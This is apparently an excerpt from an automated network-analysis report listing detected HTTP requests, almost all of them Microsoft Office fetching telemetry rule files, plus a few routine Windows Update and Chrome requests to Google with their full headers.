Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=bDW3NAP4YPDLl8e&MD=fuLn+LMa HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.x7CxCIZpks8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAg/rs=AHpOoo8czmnaLIncRgBQP7N2THncpDJ9mQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
